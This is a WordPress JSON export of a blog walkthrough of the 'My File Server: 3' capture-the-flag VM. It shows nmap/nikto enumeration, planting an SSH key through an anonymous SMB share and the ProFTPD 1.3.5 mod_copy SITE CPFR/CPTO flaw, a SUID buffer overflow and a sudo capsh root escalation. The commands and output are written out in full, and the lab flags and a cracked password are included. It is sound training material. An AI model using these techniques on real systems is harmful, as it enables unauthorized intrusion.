{"id":25860,"date":"2020-04-06T11:06:39","date_gmt":"2020-04-06T05:36:39","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=25860"},"modified":"2020-04-07T21:51:20","modified_gmt":"2020-04-07T16:21:20","slug":"my-file-server-3-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/my-file-server-3-walkthrough\/","title":{"rendered":"My File Server: 3 Walkthrough"},"content":{"rendered":"
I will share with you a new walkthrough for Infosec Warriors CTF<\/strong><\/a> machines. My File Server: 3 Walkthrough<\/strong> covers a CTF machine created by Vishal Biswas, AKA Cyberknight. You can download this CTF here<\/a>. It states that the level is Intermediate, and that is true. Either way, if this is unfamiliar, explore a little; that is how you learn.<\/p>\n <\/p>\n So, as always, we start with netdiscover<\/strong> to get the IP of the VM, and the IP of the host found is 192.168.2.11.<\/p>\n Let’s proceed with a network scan using an Nmap aggressive scan, as given below.<\/p>\n It was very interesting. I noticed that many ports were open and had anonymous login enabled.<\/strong> So I decided to enumerate further with Nmap scripts, along with port 80.<\/p>\n We know that there might be an “smbuser” account on the network.<\/p>\n <\/p>\n I chose to run Nikto for HTTP weak-configuration listing, and found an entry for .ssh<\/strong><\/p>\n When I tested “.ssh” in a web browser, I got an ssh folder containing id_rsa and authorized_keys.<\/p>\n <\/p>\n When I opened authorized_keys, it confirmed that “smbuser” is present on the host machine or network.<\/p>\n <\/p>\n <\/p>\n I downloaded the file authorized_keys to my local Linux machine.<\/p>\n We know that “smbdata” has read and write<\/strong> permission. So if we place the authorized_keys of our Linux machine there and………………<\/p>\n It is successfully done. We know that port 2121, ProFTPD 1.3.5, has a “file copy” vulnerability. So I logged in to FTP on port 2121 without a username and password, then copied authorized_keys from \/<\/strong>smbdata<\/strong> to \/home\/smbuser\/.ssh\/authorized_keys<\/strong>.<\/p>\n Now I tried to SSH in with the id_rsa file, and yes, we got an smbuser<\/strong> shell.<\/p>\n Here we got two folders under home, but I didn’t find anything in them, and we have no find or locate command for searching for SUID files. 
So I searched manually and found a file, “esclate” <\/strong>, which has the SUID bit set and is owned by user bla.<\/p>\n So from this file we can try to get a “bla<\/strong>” user shell. After feeding it lots of numbers and letters, sometimes it gave “Why are you here?” and sometimes “Segmentation fault”.<\/p>\n So I understood what was happening here. I gave an input whose length {number} falls between the two error cases, and yeah, “I got the bla user group”.<\/p>\n Then I tried to access the bla directory, and yes, I was finally in.<\/p>\n And got the FLAG of user bla.<\/p>\n So after cracking the hash, I got the bla user password: bla:itiseasy.<\/strong> After that, I checked the sudo permissions and rights, and I found two things that can be run with sudo: “capsh” and “setcap”.<\/p>\n And I got the root shell.<\/p>\n","protected":false},"author":1,"featured_media":25882,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[119,120,118],"yoast_head":"\nPenetration Testing Methodologies<\/h2>\n
Network Scan<\/h4>\n
Enumeration<\/h4>\n
Privilege Escalation<\/h4>\n
Network Scanning<\/h3>\n
#netdiscover -i vboxnet0\r\n\r\n Currently scanning: 192.168.60.0\/16 | Screen View: Unique Hosts\r\n\r\n 2 Captured ARP Req\/Rep packets, from 2 hosts. Total size: 102\r\n _____________________________________________________________________________\r\n IP At MAC Address Count Len MAC Vendor \/ Hostname\r\n -----------------------------------------------------------------------------\r\n 192.168.2.2 08:00:27:25:0f:48 1 42 PCS Systemtechnik GmbH\r\n 192.168.2.11 08:00:27:a8:98:39 1 60 PCS Systemtechnik GmbH\r\n<\/pre>\n
#nmap -p- -A -sC -O 192.168.2.11\r\n\r\n Nmap scan report for 192.168.2.11\r\n Not shown: 65523 closed ports\r\n PORT STATE SERVICE VERSION\r\n 21\/tcp open ftp vsftpd 3.0.2\r\n | ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n |_drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]\r\n | ftp-syst:\r\n | vsFTPd 3.0.2 - secure, fast, stable\r\n 22\/tcp open ssh OpenSSH 7.4 (protocol 2.0)\r\n | ssh-hostkey:\r\n | 2048 75:fa:37:d1:62:4a:15:87:7e:21:83:b9:2f:ff:04:93 (RSA)\r\n 80\/tcp open http Apache httpd 2.4.6 ((CentOS))\r\n | http-methods:\r\n |_http-server-header: Apache\/2.4.6 (CentOS)\r\n |_http-title: My File Server\r\n 139\/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)\r\n 445\/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)\r\n 1337\/tcp open waste?\r\n | fingerprint-strings:\r\n | GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, TerminalServerCookie:\r\n |_ Why are you here ?!\r\n 2049\/tcp open nfs_acl 3 (RPC #100227)\r\n 2121\/tcp open ftp ProFTPD 1.3.5\r\n | ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n |_drwxrwxrwx 3 root root 16 Feb 19 07:48 pub [NSE: writeable]\r\n 20048\/tcp open mountd 1-3 (RPC #100005)\r\n 35756\/tcp open nlockmgr 1-4 (RPC #100021)\r\n 35992\/tcp open status 1 (RPC #100024)\r\n 1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\r\n Device type: general purpose\r\n Running: Linux 3.X\r\n OS CPE: cpe:\/o:linux:linux_kernel:3\r\n OS details: Linux 3.4 - 3.10\r\n Network Distance: 1 hop\r\n Service Info: Host: FILESERVER; OS: Unix\r\n OS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .<\/pre>\n
Enumeration<\/h3>\n
#nmap -p 139,445 --script=smb-enum* 192.168.2.11\r\n\r\n Nmap scan report for 192.168.2.11\r\n PORT STATE SERVICE\r\n 139\/tcp open netbios-ssn\r\n 445\/tcp open microsoft-ds\r\n MAC Address: 08:00:27:A8:98:39 (Oracle VirtualBox virtual NIC)\r\n Host script results:\r\n | smb-enum-shares:\r\n | account_used: <blank>\r\n | \\\\192.168.2.11\\IPC$:\r\n | Type: STYPE_IPC_HIDDEN\r\n | Comment: IPC Service (Samba 4.9.1)\r\n | Max Users: <unlimited>\r\n | Path: C:\\tmp\r\n | Anonymous access: READ\/WRITE\r\n | \\\\192.168.2.11\\print$:\r\n | Type: STYPE_DISKTREE\r\n | Comment: Printer Drivers\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\var\\lib\\samba\\drivers\r\n | Anonymous access: <none>\r\n | \\\\192.168.2.11\\smbdata:\r\n | Type: STYPE_DISKTREE\r\n | Comment: smbdata\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\smbdata\r\n | Anonymous access: READ\/WRITE\r\n | \\\\192.168.2.11\\smbuser:\r\n | Type: STYPE_DISKTREE\r\n | Comment: smbuser\r\n | Users: 0\r\n | Max Users: <unlimited>\r\n | Path: C:\\home\\smbuser\\\r\n |_ Anonymous access: <none>\r\n Nmap done: 1 IP address (1 host up) scanned in 300.66 seconds<\/pre>\n
#nikto -h http:\/\/192.168.2.11\r\n\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP: 192.168.2.11\r\n+ Target Hostname: 192.168.2.11\r\n+ Target Port: 80\r\n+ Start Time: 2020-04-06 01:01:31 (GMT5.5)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.6 (CentOS)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type\r\n+ Apache\/2.4.6 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE\r\n+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST\r\n+ OSVDB-3093: \/.ssh\/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.\r\n+ OSVDB-3268: \/icons\/: Directory indexing found.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.<\/pre>\n
#wget http:\/\/192.168.2.11\/.ssh\/authorized_keys\r\n\r\n --2020-04-06 01:05:15-- http:\/\/192.168.2.11\/.ssh\/authorized_keys\r\n Connecting to 192.168.2.11:80... connected.\r\n HTTP request sent, awaiting response... 200 OK\r\n Length: 410\r\n Saving to: \u2018authorized_keys\u2019 \r\n authorized_keys 100%[==============================>] 410 --.-KB\/s in 0s \r\n 2020-04-06 01:05:15 (39.3 MB\/s) - \u2018authorized_keys\u2019 saved [410\/410]<\/pre>\n
#smbclient \/\/192.168.2.11\/smbdata\r\n\r\n Enter WORKGROUP\\root's password: \r\n Anonymous login successful\r\n Try \"help\" to get a list of possible commands.\r\n smb: \\> ls\r\n . D 0 Mon Apr 6 00:56:56 2020\r\n .. D 0 Tue Feb 18 17:17:54 2020\r\n anaconda D 0 Tue Feb 18 17:18:15 2020\r\n audit D 0 Tue Feb 18 17:18:15 2020\r\n boot.log N 6120 Tue Feb 18 17:18:16 2020\r\n btmp N 384 Tue Feb 18 17:18:16 2020\r\n cron N 4813 Tue Feb 18 17:18:16 2020\r\n dmesg N 31389 Tue Feb 18 17:18:16 2020\r\n dmesg.old N 31389 Tue Feb 18 17:18:16 2020\r\n glusterfs D 0 Tue Feb 18 17:18:16 2020\r\n lastlog N 292292 Tue Feb 18 17:18:16 2020\r\n maillog N 1982 Tue Feb 18 17:18:16 2020\r\n messages N 684379 Tue Feb 18 17:18:17 2020\r\n ppp D 0 Tue Feb 18 17:18:17 2020\r\n samba D 0 Tue Feb 18 17:18:17 2020\r\n secure N 11937 Tue Feb 18 17:18:17 2020\r\n spooler N 0 Tue Feb 18 17:18:17 2020\r\n tallylog N 0 Tue Feb 18 17:18:17 2020\r\n tuned D 0 Tue Feb 18 17:18:17 2020\r\n wtmp N 25728 Tue Feb 18 17:18:17 2020\r\n xferlog N 100 Tue Feb 18 17:18:17 2020\r\n yum.log N 10915 Tue Feb 18 17:18:17 2020\r\n sshd_config N 3906 Wed Feb 19 13:16:38 2020\r\n todo N 162 Tue Feb 25 19:52:29 2020\r\n id_rsa N 1766 Thu Mar 19 10:13:16 2020\r\n note.txt N 128 Thu Mar 19 10:23:12 2020\r\n\r\n\t\t19976192 blocks of size 1024. 18257932 blocks available\r\nsmb: \\> exit\r\n\r\n#cd .ssh\/\r\n#ls\r\n authorized_keys id_rsa id_rsa.pub known_hosts\r\n#smbclient \/\/192.168.2.11\/smbdata\r\n Enter WORKGROUP\\root's password: \r\n Anonymous login successful\r\n Try \"help\" to get a list of possible commands.\r\n smb: \\> put authorized_keys \r\n putting file authorized_keys as \\authorized_keys (61.7 kb\/s) (average 61.7 kb\/s)\r\n smb: \\> \r\n<\/pre>\n
#telnet 192.168.2.11 2121\r\n\r\n Trying 192.168.2.11...\r\n Connected to 192.168.2.11.\r\n Escape character is '^]'.\r\n 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.2.11]\r\n site help\r\n 214-The following SITE commands are recognized (* =>'s unimplemented)\r\n CPFR <sp> pathname\r\n CPTO <sp> pathname\r\n HELP\r\n CHGRP\r\n CHMOD\r\n 214 Direct comments to root@localhost\r\n site cpfr \/smbdata\/authorized_keys\r\n 350 File or directory exists, ready for destination name\r\n site cpto \/home\/smbuser\/.ssh\/authorized_keys\r\n 250 Copy successful<\/pre>\n
#ssh smbuser@192.168.2.11 -i id_rsa \r\n\r\n ##############################################################################################\r\n #\t\t\t\t\t InfoSec Warrior # \r\n # --------- www.InfoSecWarrior.com ------------ #\r\n # My File Server - 3\t\t\t\t\t# \r\n # \t\t\t Just a simple addition to the problem #\r\n # Designed By :- CyberKnight #\r\n # Twitter :- @CyberKnight00 #\r\n ##############################################################################################\r\n\r\n Last login: Mon Apr 6 01:39:47 2020 from 192.168.2.1\r\n [smbuser@fileserver ~]$ id \r\n uid=1000(smbuser) gid=1000(smbuser) groups=1000(smbuser)\r\n [smbuser@fileserver ~]$ hostname \r\n fileserver<\/pre>\n
[smbuser@fileserver ~]$ find \r\n -bash: find: command not found\r\n[smbuser@fileserver ~]$ ls -lha \/usr\/bin |grep esclate\r\n -rwsr-xr-x 1 bla bla 7.4K Feb 27 00:21 esclate<\/pre>\n
[smbuser@fileserver ~]$ \/usr\/bin\/esclate \r\n 123456789012345678901234567{27}\r\n Why are you here ?!\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate\r\n 123456789012345687901234567890123456{36}\r\n Segmentation fault\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate \r\n 1234567890123456789012345678901{32}\r\n Why are you here ?!\r\n[smbuser@fileserver ~]$ \/usr\/bin\/esclate \r\n 1234567890123456789012345678901234{34} \r\nsh-4.2$ id\r\n uid=1001(bla) gid=1000(smbuser) groups=1001(bla),1000(smbuser)\r\nsh-4.2$ hostname \r\n fileserver\r\nsh-4.2$ uname -a\r\n Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU\/Linux\r\nsh-4.2$ \r\n<\/pre>\n
sh-4.2$ cd home\r\nsh-4.2$ ls \r\n bla smbuser\r\nsh-4.2$ cd bla\r\nsh-4.2$ ls -lha\r\n total 40K\r\n drwx------ 2 bla bla 121 Feb 27 00:29 .\r\n drwxr-xr-x. 4 root root 30 Feb 25 16:21 ..\r\n lrwxrwxrwx 1 bla bla 9 Feb 25 19:57 .bash_history -> \/dev\/null\r\n -rw-r--r-- 1 bla bla 18 Mar 6 2015 .bash_logout\r\n -rw-r--r-- 1 bla bla 193 Mar 6 2015 .bash_profile\r\n -rw-r--r-- 1 bla bla 231 Mar 6 2015 .bashrc\r\n -rw-rw-r-- 1 bla bla 516 Feb 27 00:29 user.txt\r\n -rw------- 1 bla bla 731 Feb 26 23:36 .viminfo\r\n -rwxr-xr-x 1 root root 19K Feb 25 16:22 ynetd\r\nsh-4.2$ cat user.txt\r\n _____ _ _ ____ _____ \r\n | ___(_) | ___\/ ___| ___ _ ____ _____ _ __ |___ \/ \r\n | |_ | | |\/ _ \\___ \\ \/ _ \\ '__\\ \\ \/ \/ _ \\ '__| _____ |_ \\ \r\n | _| | | | __\/___) | __\/ | \\ V \/ __\/ | |_____| ___) |\r\n |_| |_|_|\\___|____\/ \\___|_| \\_\/ \\___|_| |____\/ \r\n Flag : 0aab4a2c6d75db7ca2542e0dacc3a30f\r\n you can crack this hash, because it is also my pasword\r\n note: crack it, itiseasy<\/pre>\n
sh-4.2$ sudo -l\r\n Matching Defaults entries for bla on this host:\r\n requiretty, !visiblepw, always_set_home, env_reset, env_keep=\"COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS\", env_keep+=\"MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE\",\r\n env_keep+=\"LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES\", env_keep+=\"LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE\", env_keep+=\"LC_TIME LC_ALL LANGUAGE LINGUAS\r\n _XKB_CHARSET XAUTHORITY\", secure_path=\/sbin\\:\/bin\\:\/usr\/sbin\\:\/usr\/bin\r\n User bla may run the following commands on this host:\r\n (ALL) NOPASSWD: \/usr\/sbin\/capsh, (ALL) \/usr\/sbin\/setcap\r\n\r\nsh-4.2$ sudo -u root \/usr\/sbin\/capsh --\r\n[root@fileserver bla]# id\r\n uid=0(root) gid=0(root) groups=0(root)\r\n[root@fileserver bla]# cd \/root\/\r\n[root@fileserver ~]# ls \r\n proof.txt\r\n[root@fileserver ~]# cat proof.txt \r\n _______ __ _____ _____\r\n \/ ____(_) \/__ \/ ___\/___ ______ _____ _____ |__ \/\r\n \/ \/_ \/ \/ \/ _ \\\\__ \\\/ _ \\\/ ___\/ | \/ \/ _ \\\/ ___\/ ______ \/_ < \r\n \/ __\/ \/ \/ \/ __\/__\/ \/ __\/ \/ | |\/ \/ __\/ \/ \/_____\/ ___\/ \/ \r\n \/_\/ \/_\/_\/\\___\/____\/\\___\/_\/ |___\/\\___\/_\/ \/____\/ \r\n \r\n flag : 7be300997079eaebcdf9975ede6746e9\r\n[root@fileserver ~]# id\r\n uid=0(root) gid=0(root) groups=0(root)\r\n[root@fileserver ~]# hostname\r\n fileserver\r\n[root@fileserver ~]# \r\n\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"